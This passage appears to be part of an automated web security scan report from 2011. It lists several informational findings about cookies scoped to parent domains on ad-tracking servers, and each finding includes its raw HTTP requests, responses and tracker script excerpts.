Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657; PUBMDCID=1; pubfreq_25281=; pubtime_25281=TMC; _curtime=1313432692; pubfreq_25281_19972_345442688=243-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:54 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; domain=pubmatic.com; expires=Wed, 14-Aug-2013 18:24:54 GMT; path=/
Set-Cookie: PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694; domain=pubmatic.com; expires=Thu, 14-Aug-2014 15:13:16 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

12.24. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc2JnRsPTQzMjAw&piggybackCookie=uid:3574436734868397339 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; pubtime_25281=TMC; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699; _curtime=1313432705; pubfreq_25281=243-1; pubfreq_28134=243-1; PUBMDCID=1; pubfreq_25281_19972_333766901=661-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:41:28 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_16=226-uid:3574436734868397339; domain=pubmatic.com; expires=Wed, 14-Aug-2013 18:41:28 GMT; path=/
Set-Cookie: PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699.76_1316025688; domain=pubmatic.com; expires=Thu, 14-Aug-2014 18:24:59 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

12.25. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=H07710 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; udm_0=MLvv8iEJPj5npx6Bo8hY2L+1+kUjsrb3zCNeeLLD9My28XeHWAmn+9uUiLtJmK0Xf/l0O0X/1QEXLQALTg9EEFT6+LvS0M0lXglFWO58f0sfMpXzDxm+S1IZqOX1U27zHDsQW85DfkLDElQZxiHk4o/4bgBacphh6513iafXO0+djO48elokzpJEwV5p+VM10YTolQIdeL+PqwoN8MZoWogMtiF4P7nOuBORNXOsEBri4O2QxDrbbsjVF6gtLc4gzm9xZHIDy/5o0mrgHflrz9L8NaQJ4pud30h65IFxZktB8T/cL3blfVZCo4zCeHwhtw8o6ke3DX1rT5v1/vZLOePywRbs0Is9YP2k//uOqA2ekuS5StfAEgkTDys/Le/wxKKupbStXd9CiIDA8mj/W2sAl+xffMJtSZ3hkNYEyWe1hCmFxLHMtn+k48ida8E/Fp5sKtJm3wMuZ8LtP/FcpQHMgHKrrjXNCaYIydhGgPmHgyI4U0uKz9He6dCPtBC5h3yc4Lqg1ID+fNKAPWC9W141XK70cpkqVKwYLOFL+yU4GITEv43m/rvhy7mVcwCxfb8Astde+mbqQ5zkJJImBbsxcaAIRVAGor/txCaGoqqROl47NOD+gvwA0LXTifL+54l7gbstyQKGqCF90Iifqi2ndawl2G8AN3IFEd84cvPFrzUi99su/ymcPLS6aGnzrsd10bSd9ebjYqlQSWj9Ns9mBrYH7MqXsYvJXK6G8pSv1oRZ2lPNiSoQ1h0JTTeR3B01HAnlPID6Ig5zd6s7JKubRt/2w7Nb6kX1pcAeFjpk+0iL7szQ4Zd/JuPVOFvnq4SC77ziTWNMXwRPQLuOtEOCfCZzUf9BTkpfuM2fh/mWqRIvXTpxN+Lnw+xMbncDk3jQACrA; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqolNtLYIVF5M27L8vfsI7WByyXJ6gBlNTNwT8g7lTtVTtlUQIhMYnhGBxqxPi16ATScNUThNteKFr5insIjhhJfnz5/4MOhd/n6wiinE7/s0pX+4B2zcJ7hc=; rtc_GS70=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9ZvCMjShpnZzliZicNbn0rTj3r40ki4zC8bshHCjemRQboH1Al2GjhyihsVmLmviEIBiwmfPx4G76pEjpFI99ARJ8f4YFvwAdZJA==; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvMlMJLipj3o8v6V8WYCIvc0VBcu/xuu9WfcVrMuPk8O7soFIKcYdQEN6uwgqX2sVezx87FOlyzEPmagY3Iz/VZ+NwxJRxWkhs5Jh7SyNGKNY/r8WDUWORsr6N+o32DlYaA2oRsZK5pcYmB9wgArNTAosm53fORrMHhNzg/3euxbOpmhb571ZQnpSGc6VnfKBN1f4G7BmiszCnRDhorxmZlHwil845mFj3srmarlE5TZGdrUPwNrgtf+wy4PgQFy0crjuwQYmpn+4PZnIDX+xIEWahVgYutgZHzYVr9ZhZk6gVqV3H+EJINFgIxTr5ZKJU6usEGhfURAjDnHRhtn0raxZdQFuMh6bxzA/4HkjFL9LcjZR4z3pkm+wtEYrulA8YD7Jqyz5Tw/LQrVqfpycODWX2yxFJPWzHqzh6VjCzUGVDq71Bkxtv/IJb9Fp/5osXWv/+k/P/iI3CEUjo6olnRkRk9YalHGVyNCcBO8AdJ9dnScC70nSjAhWSxRZmUylHP/+1fPZ2kTC773AG0D40F/aCZEfd/rqF5eBnSqT5qDrnpncHBGvgJYLRznm2rbkESA6WU6TL+xcmCm/2UxUveH5vbwOGVZWSaT49TJSa/dy+hMRc/2ZXPdExMEa8LgAmWGwpacgyLacAiLafVqwy9Kyogvh3Lp1zn5xCZRN/SO2bHBpMCxGgKgNLL8p6FNLIPykr2HhY6Ry53dzfwZ7ZdM1hSeiJOfWzIoN8KG2gP7m/e7UPGYy/j8fdmZuv8sAjmpuViz4EjNFS7UUykD25LOhmWvapfFzrcI13WsrLf4JahsSKvzo3eUHOcdIo76PjjTpFwm0/le4xyaaZ/hteERP+swToMxJi6VCD8qgCD6hpge6xHbp1xZrukTEuCz8dMY7q5pztWESpRIr4BD3fy/QsXRyVxm85ejXJq5cRZVxyiqnwaCzC9jC3P2uIJvM+saFoqJmrxyFZT3hgEUooAts+ANZt256xqEKsYW55ZSoejFJzMsK9; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:33 GMT; Path=/
Last-Modified: Mon, 15 Aug 2011 18:45:33 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 15 Aug 2011 19:45:33 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:45:32 GMT
Content-Length: 6200

//AG-develop 12.7.1-66 (2011-07-20 15:58:55 UTC)
var rsi_now= new Date();
var rsi_csid= 'H07710';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da)
...[SNIP]...

12.26. http://phoenix.untd.com/TRCK/RGST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phoenix.untd.com
Path:   /TRCK/RGST

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TRCK/RGST?AGMT=167&TIME=168&RNS=1827548113 HTTP/1.1
Host: phoenix.untd.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHRE=18DDF_1:125DC4_0_190AF|125D82_0_190AF|125DC3_0_190AD|125D81_0_190AC

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:14 GMT
nnCoection: close
Server: Phoenix/1.5.1
Content-Type: image/gif
Content-Length: 43
Set-Cookie: WHRE=18DF2_1:125D43_0_18E9A|125DC4_0_190AF|125D82_0_190AF|125DC3_0_190AD|125D81_0_190AC; expires=Thu, 12 Aug 2021 18:24:14 GMT; domain=.untd.com; path=/
P3P: policyref="http://cyclops.prod.untd.com/common/w3c/netzero.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa OUR BUS IND PHY ONL UNI FIN COM NAV INT DEM PRE LOC"
Pragma: no-cache
Expires: Tue, 25 Apr 1995 09:30:27 -0700

GIF89a.............!.......,...........D..;

12.27. http://ping.crowdscience.com/ping.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fmoney.cnn.com%2F2011%2F08%2F15%2Ftechnology%2Fgoogle_motorola%2Findex.htm%3Fhpt%3Dhp_t2&id=4c8235243e&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.112%20safari%2F535.1&x=1313434020454&c=0&t=0&v=0&m=0&vn=2.0.4&nv=0&pv=0 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csv=9532635152fbdebd

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=9532635152fbdebd; Domain=.crowdscience.com; expires=Sun, 13 Nov 2011 18:46:04; Path=/
Content-Length: 869
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=c5b0255e4fc310b1;path=/';
document.cookie = '__csv=9532635152fbdebd|0;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('968b71d8793729f4'!='1'
...[SNIP]...

12.28. http://pix04.revsci.net/A09801/b3/0/3/1008211/65654042.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /A09801/b3/0/3/1008211/65654042.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A09801/b3/0/3/1008211/65654042.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnn.com%252F%253Fundefined%253Dundefined%2526_rsiL%253D0%26DM_CAT%3Dcnn%2520%253E%2520homepage%26DM_EOM%3D1&C=A09801 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rtc_wwje=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9Za/2KdJo=; udm_0=MLvv8iEJPj5npx6Bo8hY2L+1+kUjsrb3zCNeeLLD9My28XeHWAmn+9uUiLtJmK0Xf/l0O0X/1QEXLQALTg9EEFT6+LvS0M0lXglFWO58f0sfMpXzDxm+S1IZqOX1U27zHDsQW85DfkLDElQZxiHk4o/4bgBacphh6513iafXO0+djO48elokzpJEwV5p+VM10YTolQIdeL+PqwoN8MZoWogMtiF4P7nOuBORNXOsEBri4O2QxDrbbsjVF6gtLc4gzm9xZHIDy/5o0mrgHflrz9L8NaQJ4pud30h65IFxZktB8T/cL3blfVZCo4zCeHwhtw8o6ke3DX1rT5v1/vZLOePywRbs0Is9YP2k//uOqA2ekuS5StfAEgkTDys/Le/wxKKupbStXd9CiIDA8mj/W2sAl+xffMJtSZ3hkNYEyWe1hCmFxLHMtn+k48ida8E/Fp5sKtJm3wMuZ8LtP/FcpQHMgHKrrjXNCaYIydhGgPmHgyI4U0uKz9He6dCPtBC5h3yc4Lqg1ID+fNKAPWC9W141XK70cpkqVKwYLOFL+yU4GITEv43m/rvhy7mVcwCxfb8Astde+mbqQ5zkJJImBbsxcaAIRVAGor/txCaGoqqROl47NOD+gvwA0LXTifL+54l7gbstyQKGqCF90Iifqi2ndawl2G8AN3IFEd84cvPFrzUi99su/ymcPLS6aGnzrsd10bSd9ebjYqlQSWj9Ns9mBrYH7MqXsYvJXK6G8pSv1oRZ2lPNiSoQ1h0JTTeR3B01HAnlPID6Ig5zd6s7JKubRt/2w7Nb6kX1pcAeFjpk+0iL7szQ4Zd/JuPVOFvnq4SC77ziTWNMXwRPQLuOtEOCfCZzUf9BTkpfuM2fh/mWqRIvXTpxN+Lnw+xMbncDk3jQACrA; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlJtLYIVF5M27L8vfsI7WByyXJ6gBlNTNwT8g7lTtVTtlUQIhMYnhGCxalPCFyDSiKJPgnHQBQDLJ3Rr4nnHKDvxdFk=; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_wwje=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GS70=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqolNtlR8qmZ5EYm2QQMyGpObby6m311PsHgzv01aCKDYPpg3DclGyTfYmv4eV+B8TaeJUThNteKFr5insIjhhJfnzN2nZibloi7gRJ2YvE++wSbp+230mBtxk; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:07 GMT; Path=/
Set-Cookie: rtc_vQd1=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9ZvCMjShpnZzliZicNbn0rTj3r40kiIzC8bshHCjemRQboH1Al2GjhyihsVmLmviEIBiwmfPx4G76pEjpFI99QRZ8P4IFvz9JZNg==; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:07 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:45:06 GMT
Content-Length: 734

/* AG-develop 12.7.1-66 (2011-07-20 15:58:55 UTC) */
rsinetsegs=['A09801_10001','A09801_10313'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.rep
...[SNIP]...

12.29. http://pix04.revsci.net/D08734/a1/0/0/0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEDksdBQv2eRa00pZUQMZdIU&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5; udm_0=MLv3MlMJbipn3hddo59fs/SyNUtp5oKbu+uMI45hFi1crut9DVZMSamSoBVFCRxGD5SIkS4D7WfwauVpCTw0Isk0omPT0Tbv5GMpHBVB5rNOJAP4+C/tdjadkIbYlgmXsvl6af2CYfyHx2Fc+fRI8l8hGsZQqzcAo9lQzfSm2W7ZzyQXi8WYBorNSmxkYhQQXoywAu4JjybHNxA3t69iOVyMFgoFtx1G/VLYBy2ckaOoIQANfyMKcxP+UxT3Jn7P4wgAXpu0VTPkD4N5Z7K5WidIL2L5CilY1JqslKzE1ji3W1NeFMNO9ouAijnMUhpLIVh5wexNmEO3xoxjurbe12d4EQTAQ1G4O83w0kkywHJkZ1lvDa2U/gabuvnh/a86fltTRfLC3hgQT1+ehya+ibS7NOm3Y5T9p8T7r/AVRBZmMv3ogwezAVJC8s917JE07Dl8h/jQa7j7YBBTA93WrD9BJxYWTizsonoEB5WYcFmoBk/QId91CBBXcNILKxWwqSlhyjf5AErwWPLcfEAzsTQHJhcE872Jv+ZsdTpn1XyyT4bxukBDSZGRGTw0JMZSAkdPpjsRpybMNOwZ45B6dz5MC8RRJC3Kw1+MYuyweXCNUfFJ+VnaC6FHXV8riDUULFwCNAkI0TBq/shPPICat0erHDyNmoHVEonAj7l/5KN2SAKTcTMj7DDCojn89lrgiziLJdzwDCQjximaGJ+Nnxrcl/1E44fQiTP3paeTq07w6gsCZ92FCh2OqI1FXjN+gGqWy96fehBxvVzyr2BCrWzzA8v/EaON+tZSngXUhs+gYtzqUC+NV5qgUMV79w2XXRs69BtEX8wQY2e5/7+uuwt/geJdkgLt+QIOeRPgN7x9GitTgNaD6po3S0xQCItbkSjDvL37sQk3aKzGbbygzKFbzZytJy71bToQRbkka+9nlHboploKpgM3NJ7Rxi+REO75GUPPOPr+TDJsqqT8vnWgeONaddsTuhm0tX3zgEmMZ6FK+6c=; 